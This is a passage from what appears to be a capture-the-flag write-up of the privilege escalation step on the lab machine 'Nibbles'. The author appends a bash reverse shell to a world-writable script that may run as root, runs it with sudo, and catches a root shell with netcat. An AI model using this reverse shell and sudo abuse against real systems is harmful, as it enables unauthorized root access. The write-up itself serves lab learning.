4 privesc
$ unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
$ tree
.
└── stuff
└── monitor.sh
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
ls -la
total 16
drwxr-xr-x 2 nibbler nibbler 4096 May 4 17:40 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4095 May 4 17:39 monitor.sh
We can write to it, easy reverse shell
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.75] 36550
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated